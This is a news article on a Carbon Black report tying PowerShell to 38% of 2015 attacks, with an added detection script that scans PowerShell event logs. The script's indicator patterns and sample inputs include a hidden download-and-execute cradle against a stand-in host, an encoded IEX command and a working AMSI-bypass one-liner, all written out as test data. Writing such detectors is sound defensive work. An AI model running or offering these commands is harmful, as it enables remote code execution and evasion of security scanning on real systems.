Windows PowerShell Tied to More Than a Third of Cyber Attacks
Microsoft’s Windows PowerShell scripting and configuration management framework was used in 38% of the cyber attacks seen by security firm Carbon Black and its partners in 2015, a report has revealed.
Security experts had warned that PowerShell had been fully weaponised in the past year – but Carbon Black’s first unified threat report quantifies the risk for the first time.
The report is based on data from 1,100 cyber security incidents investigated by 28 managed service providers and incident response firms in the Carbon Black partner programme, including BTB Security, EY, Kroll, Optiv, Rapid7 and Red Canary.
More than two thirds of the firms taking part in the study said they had encountered attacks that abused PowerShell in the past year.
The increased abuse of PowerShell supports a growing industry trend of malware authors experimenting with ways of evading detection by using legitimate, built-in operating system (OS) tools rather than dropping custom binaries that security products are more likely to flag, the report said.
Attacks using PowerShell are very effective at remaining undetected: 31% of Carbon Black partners reported that PowerShell-related incidents had triggered no security alerts at all, indicating that attackers are succeeding in using PowerShell both to gain entry and to persist unnoticed in a company’s systems.
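As an added example that is not part of the Carbon Black report or the original article, the following PowerShell script shows the kind of check a practitioner can run to surface PowerShell activity that would otherwise raise no alert. It assumes Script Block Logging is enabled, so that executed script text is recorded as Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log; the indicator list, the function names and the sample script blocks are constructed for illustration, not taken from any real incident.

```powershell
# Added example (not from the original article): flag suspicious PowerShell
# script blocks. Assumes Script Block Logging is enabled so that script text is
# recorded as Event ID 4104 in Microsoft-Windows-PowerShell/Operational.

# Indicators commonly seen in download cradles and obfuscated launchers.
# Illustrative, not exhaustive; -match is case-insensitive by default.
$Indicators = @(
    @{ Name = 'EncodedCommand';   Pattern = '-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{40,}' },
    @{ Name = 'DownloadCradle';   Pattern = 'Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\s' },
    @{ Name = 'InvokeExpression'; Pattern = '\bIEX\b|Invoke-Expression' },
    @{ Name = 'HiddenNoProfile';  Pattern = '-w(indowstyle)?\s+hidden|-nop(rofile)?\b|-noni(nteractive)?\b' },
    @{ Name = 'BypassPolicy';     Pattern = '-ep\s+bypass|-ExecutionPolicy\s+bypass' },
    @{ Name = 'AmsiTamper';       Pattern = 'amsiInitFailed|AmsiUtils|AmsiScanBuffer' },
    @{ Name = 'ReflectiveLoad';   Pattern = '\[Reflection\.Assembly\]::Load|FromBase64String' }
)

function Test-ScriptBlock {
    # Return the names of every indicator that matches the script block text.
    param([Parameter(Mandatory)][string]$Text)
    $hits = [System.Collections.Generic.List[string]]::new()
    foreach ($i in $Indicators) {
        if ($Text -match $i.Pattern) { $hits.Add($i.Name) }
    }
    return $hits.ToArray()
}

function Get-SuspiciousScriptBlocks {
    # Read 4104 events from the live log and return those with at least $MinHits indicators.
    param([int]$MaxEvents = 2000, [int]$MinHits = 2)
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Properties[2] of a 4104 event is the ScriptBlockText field.
            $text = [string]$_.Properties[2].Value
            if (-not $text) { return }
            $hits = @(Test-ScriptBlock -Text $text)
            if ($hits.Count -ge $MinHits) {
                [pscustomobject]@{
                    Time       = $_.TimeCreated
                    Indicators = ($hits -join ',')
                    Snippet    = $text.Substring(0, [Math]::Min(120, $text.Length))
                }
            }
        }
}

# Constructed sample script blocks (not real log data) for an offline run.
# The base64 string decodes to a harmless UTF-16LE "IEX (New-Object Net.WebClient)".
$Samples = @(
    'Get-ChildItem C:\Users | Sort-Object LastWriteTime',
    "powershell -nop -w hidden -ep bypass -c `"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')`"",
    'powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA',
    '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiInitFailed","NonPublic,Static").SetValue($null,$true)'
)

foreach ($s in $Samples) {
    $hits = @(Test-ScriptBlock -Text $s)
    '{0,-50} {1}' -f ($hits -join ','), $s.Substring(0, [Math]::Min(60, $s.Length))
}

# Against the live log (only useful if Script Block Logging was already on
# when the activity happened):
# Get-SuspiciousScriptBlocks | Format-Table -AutoSize
```

Two caveats a practitioner should keep in mind: 4104 events only exist for activity that ran after Script Block Logging was turned on (via Group Policy or the registry), so enabling it during an investigation will not recover what happened beforehand; and the script text in a 4104 event is already decoded, so the encoded-command indicator mainly catches script blocks that spawn a further PowerShell process with `-enc`, while the parent launch itself is better found in process-creation (Event ID 4688) command lines.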
Most PowerShell attacks took the form of basic or opportunistic threats using commodity malware, such as click fraud, fake antivirus and ransomware, while 13% of the attacks involving PowerShell appeared to be targeted or “advanced”.
Source | ComputerWorld